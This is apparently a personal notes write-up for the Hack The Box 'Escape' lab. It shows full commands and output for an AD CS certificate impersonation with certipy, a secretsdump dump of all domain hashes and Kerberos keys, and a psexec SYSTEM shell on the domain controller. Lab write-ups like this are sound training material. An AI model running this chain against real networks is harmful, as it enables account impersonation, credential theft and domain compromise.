Requesting Certificate with Impersonation

Since the Enrollment Rights are given to anyone in the Domain Users group, I could use anyone’s credential Certify.exe does not support requesting a certificate as someone else natively, but certipy does

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ KRB5CCNAME=../Ryan.Cooper.ccache certipy req -target dc.sequel.htb -k -no-pass -ca sequel-DC-CA -template 'UserAuthentication' -upn administrator@sequel.htb -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
[+] domain retrieved from ccache: SEQUEL.HTB
[+] username retrieved from ccache: Ryan.Cooper
[+] Trying to resolve 'dc.sequel.htb' at '10.10.11.202'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] using kerberos cache: ../Ryan.Cooper.ccache
[+] Using TGT from cache
[+] username retrieved from ccache: Ryan.Cooper
[+] Getting TGS for 'host/dc.sequel.htb'
[+] Got TGS for 'host/dc.sequel.htb'
[+] trying to connect to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[+] connected to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

I can request for a certificate as the Ryan.Cooper user, setting the UPN to impersonate the administrator user *or with `-subject CN=Administrator,CN=Users,DC=AUTHORITY,DC=HTB

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ certipy auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip $IP             
Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
[*] using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

While having a PFX of the administrataor user raises many attack vector, I can just authenticate and request KDC for a TGT

At this point, I can just use the TGT of the administrator user to dump the entire domain hashes or open a PowerShell session

Hashdump

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump SEQUEL.HTB/@dc.sequel.htb -no-pass -k -target-ip $IP -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cbf36a6101cb1a15e11f776ec6d5d77b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
sequel\DC$:plain_password_hex:987044f12976a4e2ae7d7dc4ae7b1367074da5cc5f494001daa50ff52a97dd80b6830b5bc2e43d492a6889396d3b4bef4053c14d570cff18f319093cefeecda949d1035005e4e238a88ba2187ce62cde00c27ca3446c4b119119a27d56018a8d086998bfa48550c5a52e3ad5a415849522a3d6567482f2d694fdd4a02fae57bd6d515ceaedb44dd8aa6ab4d8e87a7abd85378d4c2253652af0eb74cec4777684a6b53fbc16ec4e3b289a93858c3a00703b472354a5e6cb97089dfc6d79e42cc49fabfc8fe08957ba10a7de4c3eabb9ce7011eadb308443277b45deac76ee0e79bfd602e3ccfef45d3c8bb64af35516fe
sequel\DC$:aad3b435b51404eeaad3b435b51404ee:a97d08b92c4846dcf059c935598be875:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM 
 0000   31 BF AC 76 98 3E CF 4A  FC BD AD 0F 17 0F 49 E7   1..v.>.J......I.
 0010   DA 65 A6 F9 C7 D4 FA 92  0E 5C 60 74 E6 67 BE A7   .e.......\`t.g..
 0020   88 14 9D 4D E5 A5 3A 63  E4 88 5A AC 37 C7 1B F9   ...M..:c..Z.7...
 0030   53 9C C1 D1 6F 63 6B D1  3F 77 F4 3A 32 54 DA AC   S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] _SC_MSSQL$SQLMOCK 
sequel\sql_svc:REGGIE1234ronnie
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
Tom.Henn:1103:aad3b435b51404eeaad3b435b51404ee:22e99d2b3043bbb0a480705c9b0e71ac:::
Brandon.Brown:1104:aad3b435b51404eeaad3b435b51404ee:f562f509ad646c666f83b45f90a58af3:::
Ryan.Cooper:1105:aad3b435b51404eeaad3b435b51404ee:98981eed8e9ce0763bb3c5b3c7ed5945:::
sql_svc:1106:aad3b435b51404eeaad3b435b51404ee:1443ec19da4dac4ffc953bca1b57b4cf:::
James.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:cc69ea05e9ab430702679d5706b39075:::
Nicole.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:235da7fbef7d0861301b4078d56afdc5:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:a97d08b92c4846dcf059c935598be875:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0ba0bb35571c5d0e19849c9c2b92539a4ce6a8fd3dd6348fb6a0888797dedd16
Administrator:aes128-cts-hmac-sha1-96:37cbf2133cdec2b7e5531957a21e791f
Administrator:des-cbc-md5:5d76e0d3c245a2a4
krbtgt:aes256-cts-hmac-sha1-96:b3f74f6e968fb5d2cf17f36f417bc46259623626953ed30f8faf3cd00b91c8de
krbtgt:aes128-cts-hmac-sha1-96:919e6861b6306e3367a9223a154473ec
krbtgt:des-cbc-md5:6d1f1cd391e01a91
Tom.Henn:aes256-cts-hmac-sha1-96:bb3886d7e3201d11055cf8a2ef587d83b448d33d77aab36dd84b4ce8c59fc0a2
Tom.Henn:aes128-cts-hmac-sha1-96:0a221bf0f01f109c86cc1668783b80d3
Tom.Henn:des-cbc-md5:1a46dc3858150401
Brandon.Brown:aes256-cts-hmac-sha1-96:1aad383c76610c43bf638873ff5d7f0d7cd5cffccdfb6dd16754f15b83217550
Brandon.Brown:aes128-cts-hmac-sha1-96:cb92957a61468212c2e1f26f2958b892
Brandon.Brown:des-cbc-md5:91b3a13edf6e6201
Ryan.Cooper:aes256-cts-hmac-sha1-96:b9a2b7df6161b9a31a15cfbbb17f68a5b3904eaa2ea21d8ed2ef9acb5e27b997
Ryan.Cooper:aes128-cts-hmac-sha1-96:cbe89554da97001fa8fd0967f1799104
Ryan.Cooper:des-cbc-md5:f4a445754f540104
sql_svc:aes256-cts-hmac-sha1-96:bcbbff82091c7c6f9875261d3ada97274d01b4a1f93ceb16e8154606e392a4ae
sql_svc:aes128-cts-hmac-sha1-96:decddf91c717c5a5b84e112f576ece3b
sql_svc:des-cbc-md5:73ae15efdafe751f
James.Roberts:aes256-cts-hmac-sha1-96:d503bb2c7eea7bf50e7f68ca967e4a6f8a903b22cffa07cf2c160580156f8a43
James.Roberts:aes128-cts-hmac-sha1-96:33c8d3d907cd51ffa5274ce0b16ba448
James.Roberts:des-cbc-md5:e53de99770a20bf2
Nicole.Thompson:aes256-cts-hmac-sha1-96:fd75cd1b02ed4cb838c996db6d7616157d19545c60fb23156abdb3a400bc371c
Nicole.Thompson:aes128-cts-hmac-sha1-96:0c86380c787deb624027e9d1d8d71ab2
Nicole.Thompson:des-cbc-md5:31b5e386b33e2589
DC$:aes256-cts-hmac-sha1-96:90b5a02c4064bd67238871f843e5d4e5814e4a7c9cab42616ec43f9b11a8176e
DC$:aes128-cts-hmac-sha1-96:351e6337a2b6a7468d15eb5ab29ea2dd
DC$:des-cbc-md5:d91a19515245f85e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell drop

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec SEQUEL.HTB/@dc.sequel.htb -no-pass -k -target-ip $IP -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on 10.10.11.202.....
[*] Found writable share ADMIN$
[*] Uploading file RAlWWtaR.exe
[*] Opening SVCManager on 10.10.11.202.....
[*] Creating service lQKn on 10.10.11.202.....
[*] Starting service lQKn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
dc
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::21c
   ipv6 address. . . . . . . . . . . : dead:beef::31e1:eb54:2784:d5cd
   link-local ipv6 address . . . . . : fe80::31e1:eb54:2784:d5cd%4
   ipv4 address. . . . . . . . . . . : 10.10.11.202
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%4
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

Escape_Privilege_Escalation

Requesting Certificate with Impersonation

Hashdump

Shell drop

Interactive Graph View

Table of Contents

Backlinks